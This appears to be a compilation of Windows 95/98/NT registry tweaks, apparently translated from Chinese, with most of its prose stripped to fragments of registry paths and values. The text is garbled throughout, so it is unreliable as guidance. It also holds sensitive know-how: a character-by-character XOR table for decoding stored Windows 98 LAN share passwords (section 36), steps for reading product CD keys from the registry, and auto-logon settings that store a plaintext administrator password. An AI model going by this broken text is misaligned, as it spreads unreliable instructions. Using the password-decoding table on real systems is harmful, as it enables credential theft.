40 01 00 2070 01 00 20
22
HKEY_CURRENT_USER\ControlPanel\desktop
HungAppTimeout
5000(5)3000MenuShowDelay
1000.1
ScreenSaveActive0101
ScreenSaveTimeOut60
11WaitToKillAppTimeout Crtl+Alt+Del
10000
23
Windows,
HKEY_CURRENT_USER\Control Panel\ColorsBottontext
0 0 0255 0 0
24
HKEY_CURRENT_USERS\Software\Microsoft\WindowsCurrentVersion
01
25Enter
HKEY_CURRENT_USER\Software\Microsoft\WindowsCurrentVersion
01Esc 1
26Space
HKEY_CURRENT_USER\Software\Microsoft\WindowsCurrentVersion
01
27
HKEY_CURRENT_USER\ControlPanel\InternationalsTimeFormat
H:mm:ssHHmm
Windows23:12
28
HKEY_USERS\.DEFAULT\Control Panel\Desktop
Wallpaper
29
HKEY_LOCALMACHINE\Software\Microsoft\WindowsCurrentVersionProductId
30
Windows
Windows
CD
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
RunSysExplrWindows
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsCurrentVersion\Run
SysExplorerExplorer.exe
WindowsRunRunOnceRunOnceEx
Windows
31
HKEY_LOCAL_MACHINE\System
\CurrentControlSet\Control\fontassoc\Associated
CharSetSYMBOL(02) NO
32
Windows
/
XXXXXX
HKEY_LOCAL_MACHINE
\Software\Microsoft
\Windows\CurrentVersion\UninstallDisplayNameUninstallString
Install.log.log
HKEY_LOCAL_MACHINE\SoftwareHKEY_CURRENT_USER\SoftwareHKEY_USERS\.Default
\Software
HKEY_LOCAL_MACHINE\Software
33CD Key
WindowsCDKeyNT
CDKeyHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersionProductId
CDKeyNTOEMProductIdCDKey
34
NTHKEY_LOCAL_MACHINE\SOFTWARE
\Microsoft\WindowsNT\CurrentVersion\WinlogonLegalNoticeCaptionLegalNoticeText
35
Windows NT
NT
NTSecurityPack5
NT
Modem NT
HKEY_LOCAL_MACHINE
\System\CurrentControlSet\Services\lanmanagerserver\parametersAutoShareWks
3D0
36ICQ
ICQMirabilisInternet
ICQ for Windows ICQWindowsAuto Update
Yes
ICQ HKEY_CURRENT_USERSoftware
ICQ
37
DOSWindows
C:\ProgramFiles
\pdoc\pdoc.exeHKEY_LOCAL_MACHINE\Software\MicrosoftWindows\CurrentVersion\AppPaths
pdoc.exeC:\ProgramFiles\pdoc\pdoc.exePath
C:\ProgramFiles\pdocpdoc.exe pdoc
MicrosoftWord 97Word.exeWord 97C:\ProgramFiles
\MicrosoftOffice\Office\HKEY_LOCAL_MACHINE\Software\Microsoft
\Windows\CurrentVersion\AppPathsWord.exeC:\ProgramFiles\MicrosoftOffice\OfficeWinword.exe
38
WindowsWin 98
Win 98*.CABD:\Backup\PWin98
HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionSetup
SourcePathD:\Backup\PWin98\ Win98D:
\Backup\PWin98\MMX233D
DiskDSourcePath\\MMX233\DiskD\BackupPWin98\Windows
39IE
HKEY_LOCAL_MACHINE\SoftwareMicrosoft\Windows
\Currentversion\Policies\RatingsIE
Internet?
keyIE
.
40Windows
QUAKEWindows
WindwosHKEY_LOCAL_MACHINE\System
\CurrentControlSet\control\Nls\Locale0000080400000409.
41IE
HKEY_LOCAL_MACHINESOFTWARE\Microsoft\Internet Explorer\Main
Window Title(.
42DLL
WIN98SystemDLLSystem
DLL
1REGEDIT
2
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SharedDLLs
SharedDLLsDLLDLL00 00
00 000x00000001 1
3System
43
.LNK.PIFMSDOS
1HKEY_CLASSES_ROOT\lnkfile
2lnkfileIsShortcut.LNK
IsShortcut
3Win98
MSDOS.PIFHKEY_CLASSES_ROOT\piffile
26win9X
Windows 95MicrosoftWindowsREGISTRYWindows NTWindows 95Windows
98WindowsWindowsWindowsWindowsWindows
Windows 98DOSScanreg/Restore ()
,Windows,.(Windows,System.datSystem.da0,User.datUser.da0,Windows,.)
"".REG. WindowsOther\Misc\ERU\ERU.EXE(Emergency Recovery
Utility).
sysytem.iniwin.inimsodos.sysSystem.datERU,AC\ERDDOSC:\erdERD,
r eax,0)......
windowswindows2human.ini
windowsghostwindows
windowsdosxcopyxcopy c:\windows\*.*
c:\winbak/s/e/h/k/y/c,xcopy/winbakwindowsdosdosxcopyxcopy32h
windowsctrl+A)windowsWIN386.SWPwindowsWIN386.SWPCTRLwidnowsWIN386.SWPdosren
CERUDOSRENren windows win,ren winbak windowswinbak
windowswindowsghost
regedit
windowswindows
?
1.HKEY_USERS
HKEY_USERS HKEY_USERS
2.HKEY_CURRENT_USER
, ( ) Windows?8 HKEY_USERS HKEY_CURRENT_USER
3.HKEY_CURRENT_CONFIG
( ) , MRU Windows?8
4.HKEY_CLASSES_ROOT
ole hkey_local_machine\software\classes Windows?8 ,
5.HKEY_LOCAL_MACHINE
, SYSTEM.DAT , HKEY_LOCAL_MACHINE ,
System.ini
6.HKEY_DYN_DATA
1.
255 9 D:\pwin98\trident a ba MRUList Win.ini Ssyt-em.ini INI
2.
10 ? 10 Wizard 80?0?0?0 11 ASCII
3.DWORD
DWORD 32 4 DWORD 12 DWORD 16
,:
Win9X,;
,;
,;
;
.
27Win98
Win98Win98Win95Win95Win95 Win98Win98
Cache
40Win984CD-ROMCache
Cache 32MB 64MB128MB
HKEY_LOCAL_MACHINE\System\CurrentControlSet
\control\FileSystem\CDFSCacheSizePrefetchWin98
0000026b000000e4
CacheSize DWORD
0000026b
000004d6
000009ac
Prefetch DWORD
4x 000000e4
8x 000001c0
16x 00000380
24x 00000540
32x 00000700
32 CDFS Win98 32 Win98 Cache 32 32
SCANREG.EXE SCANREGW.EXE Win98 Win98
system.datuser.datwin.inisystem.iniCAB Win98 SYSBCKUP 500K
HKEY_LOCAL_MACHINE\Software\Microsoft\ Windows\Current
Version\RunScanRegistryC:\Windows\Scanregw.exe /autorunWin98
SCANREG.INIBackup=1 Backup=0
Win98 Win98 MicrosoftWin98
HKEY_LOCAL_MACHINE\ Software\Microsoft
\DriverSigningPolicy010201102212
IE4
Win98 IE4 IE hotmail IE4 www.hotmail.comHKEY_LOCAL_MACHINE\
SOFTWARE\Microsoft\Internet Explorer\Main\UrlTemplate%s
www.%s.com.cn
Win98Ctrl + FHKEY_LOCAL_MACHINESoftware\
Microsoft\Windows\CurrentVersion\App Paths App Path
HKEY_LOCAL_MACHINE\System\
CurrentControlSetcontrol\FileSystemContigFileAllocSizeDWORDContigFileAllocSize0x000001F4500
HKEY_CURRENT_USER\ Control
Panel\desktopCursorBlinkRateCursorBlinkRate-1OK
Win98 HKEY_CURRENT_USER\AppEventsSchemes\AppsApps.Default
Apps OpenCloseOpenClose
AppGPFault
Default
Maximize
MenuCommand
MenuPopup
Minimize
RestoreDown
RestoreUp
SystemExclamation
SystemQuestion
HKEY_LOCAL_MACHINE\config\0001\ Display\settingsfixedfon.fon
vgafix.fonTTF fon
?BR>HKEY_CURRENT_USER\
Software\MicrosoftWindows\CurrentVersion\
Policies\ExplorerNoLogOff01 00 00 00
DWORDNoFavoritesMenu1
NoRecentDocsHistory01 00 00 00
28WinNT
--Windows NTCtrl + Alt + DeleteWindows NTWindows NT
--1*regedit.exe
--2HKEY_LOCAL_MACHINE\SOFTWARE\MicrosoftWindowsNT\CurrentVersion\Winlogon
--3AutoAdminLogon1
--4DefaultDomainNameDomainMycomputer
--5DefaultUserNameAdministrator
--6**DefaultPassword
--7
--AutoAdminLogon0
--Ctrl+A1t+Delete
--11
--22
--3LegalNoticeCaption
--4LegalNoticeText
--5
--Ctrl+Alt+DeleteWindows NT
--11
--22
--3ShutdownWithoutLogonl
--4
--
29Follow Me
,?,?
?,",,!(,,)
,,",!
ABC
A ,Windows
3.x,INI,Windows9x,,,Windows9x,Config.sys,Autoexec.bat,System.ini,Win.iniProtocol.ini!
B
,,,::System.datUser.dat,;,CWindows,,System.da0User.da0(.da),CWindows,Windows
98,C:\Windows\Bak,,,,Regedit"
,"ScanRegistry,Scanreg.exe,cab,C:\Windows\sysbckup,rb00x.cab()
C
""HKEY":,";,,():
(1)HKEY_CLASSES_ROOT:,
(2)HKEY_CURRENT_USER:,HKEY_USERS\.Default,
(3)HKEY_LOCAL_MACHINE:(),
(4)HKEY_USERS:,HKEY_CURRENT_USER,
(5)HKEY_CURRENT_CONFIG:,HKEY_LOCAL_MACHINE\Config
(6)HKEYDYN4DATA:,
,Windows,System.datUser.dat,,,()
30
:[HKEY_CURRENT_USER\Control Panel\Desktop]
1:"PaintDesktopVersion"="1" or "0"
: Win98
2:"MenuShowDelay"="0"
:
:[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
1:"NoActiveDesktop"=hex:01, 00,00,00
: (Active Desktop)
2:"NoSaveSettings"=hex:01,00,00,00
: Windows
3: "Nodesktop"=hex:01,00,00,00
:
4:"NoStartBanner"=hex:01,00,00,00
:""
:[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorerDesktop\NameSpace]
{450d8fba-ad25-11d0-98a8-0800361b1103}
:""
{645FF040-5081-101B-9F08-00AA002F954E}
:""
{208D2C60-3AEA-1069-A2D7-08002B30309D}
:""
:[HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder]
1:"Attributes"=hex:50,01,00,20
:""
:[HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\InProcServer32]
1:""="shell32.dll-" :
:[HKEY_CLASSES_ROOT\CLSID\{21EC2020-3AEA-1069-A2DD-08002B30309D}\InProcServer32]
1:""="shell32.dll-" :
:[HKEY_CLASSES_ROOT\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\InProcServer32]
1:""="shell32.dll-" :
:[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32]
1:""="shell32.dll-" :
:[HKEY_CURRENT_USER\Control Panel\Colors]
1:"Bottontext"="RRGGBB"(RGB) :
:[HKEY_CURRENT_USER\Control Panel\Desktop]
1:"MenuDropAlignment"="0""1"
:(0;1)
31
:[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
\System]
1:"NoSecCPL"=dword:00000001 :""
2:"NoDispCPL"=dword:00000001 :""
3:"NoDispBackgroundPage"=dword:00000001
:""""
4:"NoDispScrSavPage"=dword:00000001
:""""
5:"NoDispAppearancePage"=dword:00000001
:""""
6:"NoDispSettingsPage"=dword:00000001
:"""","Web"""
7:"NoDevMgrPage"=dword:00000001
:""""
8:"NoConfigPage"=dword:00000001
:""""
9:"NoVirtMemPage"=dword:00000001
:""""""
10:"NoFileSysPage"=dword:00000001
:""""""
:[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network]
1:"NoNetSetup"=dword:00000001 :""
2:"NoNetSetupIDPage"=dword:00000001
:""""
3:"NoNetSetupSecurityPage"=dword:00000001
:""""
4:"NoWorkgroupContents"=dword:00000001
:""""
5:"NoEntireNetwork"=dword:00000001
:""""
6:"NoFileSharingControl"=dword:00000001
:"""
32
:[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\PoliciesExplorer]
1"NoRecentDocsMenu"=hex:01,00,00,00
(Documents)
2"ClearRecentDocsonExit"=hex:01,00,00,00
3NoRecentDocsHistory=hex:01,00,00,00
4NoFind=hex:01,00,00,00
(Find)
5NoRun=hex:01,00,00,00
(Run)
6NoLogOff=hex:01,00,00,00
(LogOff)
7NoClose=hex:01,00,00,00
(ShutDown)
8NoSetFolders=Hex:01,00,00,00
(Setting)
9NoFavoritesMenu=hex:01,00,00,00
(Favorite)
10NoStartBanner=hex:01,00,00,00
""
11"NoSetTaskbar"=hex:01,00,00,00
(Setting)
:[HKEY_CLASSES_ROOT\Directory\shell\find\ddeexec]
="[FindFolder("", )]" :""
:[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Shell
Icons]
"19"="c:\icon\icon1.ico"()
"43"="c:\icon\icon2.ico"
"20"="c:\icon\icon3.ico"
"21"="c:\icon\icon4.ico"
"22"="c:\icon\icon5.ico"
"23"="c:\icon\icon6.ico"
"24"="c:\icon\icon7.ico"
"44"="c:\icon\icon8.ico"
"27"="c:\icon\icon9.ico"
6();8();11();...
windows ShellIconCache()
33
:[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\FileSystem\CDFS]
1:"Prefetch"=dword:000000e4()
: CDROMCDROM.
:(CDROM,:VCDVCD,)
4:000000e4()
8:000001c0
16:00000380
24:00000540
32:00000700
36:00000750
40:00000800
48:00000800
2: "CacheSize"=dword:0000026b()
:CDROM
0000026b()
000004d6()
000009ac()
:[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Class\fdc\0000]
1:"ForceFIFO"=dword:00000001
:
:[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\FileSystem]
1:"ConfigFileAllocSize"=dword:000001f4
:
34Windows
windowswindows
CLSID
WindowsWindowsWindowsWindowssystem.datuser.datsystem.da0user.da0Windowsregedit.exewindowswin95win.inisystem.ini.ini.
windowssystem.iniwin.inisystem.iniwin.ini.ini.iniwin.inisystem.ini.INIExcelexcel.iniExcelsystem.iniwin.iniexcel.ini
system.iniwin.iniwindows.ini.ini.inisystem.iniwin.ini.ini64KB.iniiniwin.inisystem.ini.ini.iniWIN.INI
32.3240MB
Windows NTWindows9532/3216WinntBIOSWin9516system.ini16NTWin95
win.inisystem.ini
32BIOSBIOS
32
Win95Winnt .ini.ini
32WinntWin95
Windows
Winnt
DEFAULTSAMSECURITYSOFTWARESYSTEMNTUSER.DAT
Win95windowsSYSTEM.DATNTWin95NTWin95NT
Win95windowsuser.dat||\WINDOWS
\Profiles\username\USER.DATuser.datUSER.DAT
HKEY_LOCAL_MACHINE
HKEY_CLASSES_ROOT
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
HKEY_USERS
HKEY_CURRENT_USER
WinntWin95Win95Winnt32
HKEY_CLASSES_ROOT HKEY_CURRENT_CONFIG
HKEY_LOCAL_MACHINEHKEY_CURRENT_USERHKEY_USERS
HKEY_LOCAL_MACHINEHKEY_CLASSES_ROOT
HKEY_CURRENT_CONFIGHKEY_CURRENT_CONFIGHKEY_CLASSES_ROOT
HKEY_CLASSES_ROOTHKEY_LOCAL_MACHINESOFTWARE\ClassesHKEY_CLASSES_ROOT
HKEY_USERSHKEY_CURRENT_USERHKEY_CURRENT_USER
Exploer+-
windowsHKEY_LOCAL_MACHINEWindows NTExplorerWin95
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOT
;
;
ID;
DDEOLE;
;
HKEY_CURRENT_CONFIG.
HKEY_CURRENT_CONFIGHKEY_LOCAL_MACHINE|||HKEY_LOCAL_MACHINEWin95WinntHKEY_CURRENT_CONFIG
HKEY_DYN_DATA
HKEY_DYN_DATAWin95HKEY_DYN_DATAWin95Win951600Win95
HKEY_USERS
HKEY_USERS
HKEY_CURRENT_USER
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINEHKLM
HKEY_LOCAL_MACHINE\AppEvents
/Win95/98AppEvents
HKEY_LOCAL_MACHINE\Config
HKCC000100020001
HKEY_LOCAL_MACHINE\Config\0001\Display
Windows(regedit.exeResolution640,480800,600
HKEY_LOCAL_MACHINE\Config\0001\System
HKEY_LOCAL_MACHINEConfig\0001\System\CurrentControlSet\Control\Print
\Printers
HKEY_LOCAL_MACHINE\Enum
EnumWin95.iniBIOS, ESDI, FLOP, HTREE, ISAPNP, Monitor, Network,
Root, SCSI, VIRTUAL
HKEY_LOCAL_MACHINE\Enum\BIOS
BIOS*pnp0400LPT1LPT1EnumRoot
HKEY_LOCAL_MACHINE\Enum\Root
RootSCSIWin95ForcedConfig
HKEY_LOCAL_MACHINE\Enum\Network
win95
HKEY_LOCAL_MACHINE\HARDWARE
hardwareDESCRIPTIONcomhardware
HKEY_LOCAL_MACHINE\Network
HKEY_LOCAL_MACHINE\Enum\Networklogonlmlogon0=false
1=truelogonvalidatedWindows
HKEY_LOCAL_MACHINE\SECURITY
security NT
HKEY_LOCAL_MACHINE\SOFTWARE
32.ini
\Microsoft\Windows\Current Version
1.App paths 32
2.Applets, Compression, Controls Folder :
3.Detect, explorer :Namespace keys of DesktopMy
Computer----CLSID----
4.Extensions :
5.Fonts, fontsize, FS Templates :
6.MS-DOS Emulation :
7.MS-DOS Options :doshimem.syscd-roms
8.Network :
9.Nls, Policies :
10.ProfileList :
11.WindowsHKEY_LOCAL_MACHINE\Microsoft
\Windows\CurrentVersion\
Run :
RunOnce : windows
RunServices : RunVXDs,McAfeeRegServ
RunServicesOnce : windows:win95windows
Runwindows
12.SharedDLLsDLL
13.Shell Extensions:OLECLSID
14.ShellScrap :PriorityCacheFormatsSmartDrive
15.Time Zones :
16.Uninstall/.......winlogon
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet
windows ntwin95
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control
win95
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
win95
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
\Arbitrators
arbitratorsDMAI/OIRQ
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
\Class
classwin95classes
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servicesinetaccs
ieie20
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ServicesMSNP32
msnp32microsoft
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ServicesNWNP32
nenp32windowsnetware
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ServicesRemoteAccess
win95
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ServicesSNMP
snmp
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ServicesVxD
vxdwin9532win95vxds
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ServicesWebPost
webpostinternetisp
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ServicesWinsock
internetwinnsockinternet
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ServicesWinTrust
wintrustInternet
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOTWin95WinntHKEY_CLASSES_ROOT
HKEY_CLASSES_ROOTWin95WinntHKEY_CLASSES_ROOTHKEY_LOCAL_
MACHINE\Software\ClassesHKEY-
CLASSES_ROOT
Windows-------HKCRHKCR
Win95HKCR
HKCR
\???
\object
CLSID
\CLSID
WindowsCLSIDCLSID
Excel 7Word 7WordExcelExcelExcel
7ExcelCLSIDWordCLSIDCLSID.DLL
CLSIDOLEDDECLSIDCLSID---3216/OLE.dll
1)shell:Shellactionopencommandcommandopenshellopenopencommand"C:\Windows
\Notepad.exe %1")View,Print,Copy,Virus,Scan
2)shellex:ShellexOLEDDECLSIDCLSID.dll
3)shellnew:ShellNewcommand
4)DefaultIcon:DefaultIcondefault"C:\Windows \System
\shell32.dll,2" 20Shell32.dll
HKEY_CLASSES_ROOTnt
HKEY_CLASSES_ROOTHKEY_CLASSES_ROOTSYSTEM.INI WIN.INI
HKEY_CURRENT_CONFIG
win95HKEY_LOCAL_MACHINE\ConfigHKEY_LOCAL_MACHINE\ConfigHKEY_LOCAL_MACHINE
.HKEY_CURRENT_CONFIG
HKEY_CURRENT_CONFIG
HKEY_CURRENT_CONFIG00020002
HKEY_CURRENT_CONFIG HKEY_LOCAL_MACHINE
HKEY_DYN_DATA
HKEY_DYN_DATAWin95
HKEY_DYN_DATAPCMCIA
Config Manager
Win95HKEY_CURRENT_CONFIG
Enum
PerfStats
Security
HKEY_USERS
HKEY_USERSwin95nt
win95user.datwinntntuser.dat.dat
HKEY_USERS\.DEFAULT
HKEY_USERS\.DEFAULT\AppEvents
HKEY_USERS\.DEFAULT\AppEvents\Schemes
HKEY_USERS\.DEFAULT\Console
MS-DOS
HKEY_USERS\.DEFAULT\Control Panel
HKEY_USERS\.DEFAULT\Control Panel\Accessibility
HKEY_USERS\.DEFAULT\Control Panel\Appearance
HKEY_USERS\.DEFAULT\Control Panel\Appearance\Schemes
HKEY_USERS\.DEFAULT\Control Panel\Colors
WindowsRGB0 0 0000255 255 255RGB
HKEY_USERS\.DEFAULT\Control Panel\Sound
HKEY_USERS\.DEFAULT\Environment
HKEY_USERS\.DEFAULT\Keyboard Layout
HKEY_USERS\.DEFAULT\Software
HKEY_USERS\.DEFAULT\Software\Microsoft
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows
windowswindows ntwin95
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows NT
nt windows nt
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows
NTCurrentVersion\Winlogon
windows nt
HKEY_USERS\.DEFAULT\UNICODE Program Groups
unicodeexplorer
S-1-5-21-1658001358-1336221227-1912232085-500 (SID)
HKEY_USERS\S-1-5-21-1658001358-1336221227-1912232085-500
sidsidsidntuser.dat
HKEY_USERS\SID\Network
H: \\server1\docs
HKEY_USERS\SID\Printers
HKEY_USERS\SID\Software
HKEY_USERSsidntuser.dat
HKEY_CURRENT_USER
HKEY_CURRENT_USERHKEY_USERSHKEY_CURRENT_USERHKEY_USERS
HKEY_CURRENT_USERSID
(
,
/
:
1
1
2bug
3Win95Winnt
4SETUP.INFSETUP.INF
5TIF
6/
7ID
2
1
2
3UPS
4
3
1
2
Windows
Windows:
1windows
:Win95Win98Win98
Win98Win98/ | | | |
windows || windows
2
Win95Win95,SYSTEM.DAT USER.DAT
Starting Windows 95...F8SYSTEM.DAT USER.DAT
3
CFGBACK.EXEWin95Win98Win95CD-ROM\Other\Misc\CFGBACKCFGBACK.EXE
CFGBACK
CFGBACKCFGBACK
4
REGEDIT.EXE
|.REG
pkzipDos
windowsCDCD/
DOSmar99.reg.
REGEDIT /C MAR99.REG
mar99.reg
:Win98Scanreg.exewindows Scanreg /fix
.reg.regREGEDIT.EXE
Windows
Restart
Redetect
Restore
Reinstall
Restart
Win95RAMRAM
IDIDIDID
Windows
Redetect the Devices
Win95
WindowsWin95
Restore
CFGBACK
CFGBACK
.REG.REGREGEDIT.EXE
Reinstall
Win95
WindowsSYSTEM.1STWindowssystem.datwindowsdosSYSTEM.DATwindows
.INI,.DLL50%IE4.0system.1stDll
35
CtrlAltDelWindowsExploreWindows
36Windows98
LAN
HKEY_LOCAL_MACHINE\SOFTWAREMicrosoft\Windows\CurrentVersion\Network\LanMan
parm1enc ()
parmienc "74d80e"
"74 d8 0e"
a[1] = 74, b[2] = d8, and c[3] = 0e
ABC
A =74 =db =0c =e7 =12 =e8 =95 =2b
B =77 =d8 =0f =e4 =11 =eb =96 =28
C =76 =d9 =0e =e5 =10 =ea =97 =29
D =71 =de =09 =e2 =17 =ed =90 =2e
E =70 =df =08 =e3 =16 =ec =91 =2f
F =73 =dc =0b =e0 =15 =ef =92 =2c
G =72 =dd =0a =e1 =14 =ee =93 =2d
H =7d =d2 =05 =ee =1b =e1 =9c =22
I =7c =d3 =04 =ef =1a =e0 =9d =23
J =7f =d0 =07 =ec =19 =e3 =9e =20
K =7e =d1 =06 =ed =18 =e2 =9f =21
L =79 =d6 =01 =ea =1f =e5 =98 =26
M =78 =d7 =00 =eb =1e =e4 =99 =27
N =7b =d4 =03 =e8 =1d =e7 =9a =24
O =7a =d5 =02 =e9 =1c =e6 =9b =25
P =65 =ca =1d =f6 =03 =f9 =84 =3a
Q =64 =cb =1c =f7 =02 =f8 =85 =3b
R =67 =c8 =1f =f4 =01 =fb =86 =38
S =66 =c9 =1e =f5 =00 =fa =87 =39
T =61 =ce =19 =f2 =07 =fd =80 =3e
U =60 =cf =18 =f3 =06 =fc =81 =3f
V =63 =cc =1b =f0 =05 =ff =82 =3c
W =62 =cd =1a =f1 =04 =fe =83 =3d
X =6d =c2 =15 =fe =0b =f1 =8c =32
Y =6c =c3 =14 =ff =0a =f0 =8d =33
Z =6f =c0 =17 =fc =09 =f3 =8e =30
space =15 =ba =6d =86 =73 =89 =f4 =4a
1 =04 =ab =7c =97 =62 =98 =e5 =5b
2 =07 =a8 =7f =94 =61 =9b =e6 =58
3 =06 =a9 =7e =95 =60 =9a =e7 =59
4 =01 =ae =79 =92 =67 =9d =e0 =5e
5 =00 =af =78 =93 =66 =9c =e1 =5f
6 =03 =ac =7b =90 =65 =9f =e2 =5c
7 =02 =ad =7a =91 =64 =9e =e3 =5d
8 =0d =a2 =75 =9e =6b =91 =ec =52
9 =0c =a3 =74 =9f =6a =90 =ed =53
0 =05 =aa =7d =96 =63 =99 =e4 =5a
~ =4b =e4 =33 =d8 =2d =d7 =aa =14
` =55 =fa =2d =c6 =33 =c9 =b4 =0a
! =14 =bb =6c =87 =72 =88 =f5 =4b
@ =75 =da =0d =e6 =13 =e9 =94 =2a
# =16 =b9 =6e =85 =70 =8a =f7 =49
$ =11 =be =69 =82 =77 =8d =f0 =4e
% =10 =bf =68 =83 =76 =8c =f1 =4f
^ =6b =c4 =13 =f8 =0d =f7 =8a =34
& =13 =bc =6b =80 =75 =8f =f2 =4c
* =1f =b0 =67 =8c =79 =83 =fe =40
( =1d =b2 =65 =8e =7b =81 =fc =42
) =1c =b3 =64 =8f =7a =80 =fd =43
- =18 =b7 =60 =8b =7e =84 =f9 =47
_ =6a =c5 =12 =f9 =0c =f6 =8b =35
+ =1e =b1 =66 =8d =78 =82 =ff =41
= =08 =a7 =70 =9b =6e =94 =e9 =57
[ =6e =c1 =16 =fd =08 =f2 =8f =31
] =68 =c7 =10 =fb =0e =f4 =89 =37
{ =4e =e1 =36 =dd =28 =d2 =af =11
} =48 =e7 =30 =db =2e =d4 =a9 =17
; =0e =a1 =76 =9d =68 =92 =ef =51
: =0f =a0 =77 =9c =69 =93 =ee =50
' =12 =bd =6a =81 =74 =8e =f3 =4d
" =17 =b8 =6f =84 =71 =8b =f6 =48
, =19 =b6 =61 =8a =7f =85 =f8 =46
< =09 =a6 =71 =9a =6f =95 =e8 =56
. =1b =b4 =63 =88 =7d =87 =fa =44
> =0b =a4 =73 =98 =6d =97 =ea =54
? =0a =a5 =72 =99 =6c =96 =eb =55
/ =1a =b5 =62 =89 =7c =86 =fb =45
\ =69 =c6 =11 =fa =0f =f5 =88 =36
| =49 =e6 =31 =da =2f =d5 =a8 =16
37
[HKEY_LOCAL_MACHINE\SystemCurrentControlSet\Services\NWNP32\NetworkProvider]AuthenticatingAgent
[HKEY_LOCAL_MACHINE\SystemCurrentControlSet\Services\NWNP32\NetworkProvider]DWOREDisableDefaultPasswords1=0=
[HKEY_LOCAL_MACHINE\Network
\Logon]DWORDDomain Logon
Message,(0=1=)
HEKY_CURRENT_USER/Network/RecentRecent\ierl_server
\softwareierl_serversoftwareHEKY_CURRENT_USERNetworkRecent,Recent
IE4.0
IE4.0InternetActiveXIE4.0
HKEY_LOCAL_MACHINE\SOFTWARE\MicrosoftWindows\CurrentVersion\PoliciesPoliciesRatingsDelRatingsKeyIE4.0
Netscape
NetscapeAddress
Netscape
3.xHKEY_CURRENT_USER\Software\Netscape\NetscapeNavigator\URLHistoryDel
Netscape 4.xC:\Program
Files\Netscape\Users\caogjwj\prefs.jszys666user_prefbrowser.url_history.URL_2"
http://pcworld.com.cn/";
Netscape 4.xprefs.js
IP
IPIPHKEY_LOCAL_MACHINE\System\Cu
rrentControlSet\Services\Class\NetTrans000000010002DriverDescTCP/IPIPAddressIPMaskIPAddressIPI
PMaskIPAddress210.73.140.3210.73.140.5IPMask255.255.255.192255.255.255.192IP210.73.140.3210.73.140.5
WindowsMaxMTUMaxSSSDefaultRcvWindowDefaultTTL
a.MaxMTUMaxSSSHKEY_LOCAL_MACHINE\System\Current
Control
Set\Services\Class\NetTrans\000nn0002***nWindowsDeviceVxDsIpAddressMaxMTU576MaxSSS536
b.DefaultRcvWindowDefaultTTLHKEY_LOCAL_MACHINE\System\Current
Control
Set\Services\VxD\MSTCPDefaultRcvWindow2144DefaultTTL60646064Win95
IE5.0
HKEY_LOCAL_MACHINE\SoftwareMicrosoft\InternetExplorer\SearchCustomizeSearchSearchAssistanthttp://www.yeah.net/IE5.0
/HKEY_LOCAL_MACHINE\SoftwareMicrosoft\Windows\CurrentVersion\Network\RealModeNetAutoLogon
IE
IEWebURLabout:xxxxxxxabouthttpftpmailtogopherIEURLabout:blankblank
HKEY_LOCAL_MACHINE\SoftwareMicrosoft\InternetExplorer\AboutURLs#1http://
Web
URL
NetscapHKEY_LOCAL_MACHINE\Software\Netscape\Netscape
NavigatorURL
IEHKEY_CURRENT_USERSoftware\Microsoft\InternetExplorer\TypedURLsURL
Outlook Express
Outlook
ExpressHKEY_CURRENT_USER\Identities\{4C44D002-7BCF-11D3-9957-AB53DA238B0C}\Software\Microsoft\Outlook
Express\5.0Store Root
IE4.0
www..comIE.comwww..com.cnIE.cn
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet
Explorer\Main\UrlTemplatewww..%s.com.cn
38IE
IE5HTML
HKEY_CURRENT_USER\Software\Microsoft\Internet ExplorerDefault
HTML Editor\shell\edit\command
DreamWeaver%1
"c:\program files\macromedia\ dreamweaver 2
\dreamweaver.exe %1"IE5HTML
IE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer
Version
Internet ExplorerHKEY_LOCAL_MACHINE
\Software\Microsoft\Internet Explorer\Main windowTitleXX
IE
HKEY_CURRENT_USER\ Software\ Microsoft\ Internet
ExplorerTypedURLs
URL
HKEY_CURRENT_USER\Software\Microsoft\InternetExplorerTypedURLs
url1url2url3......URL,url URL
IE4.0
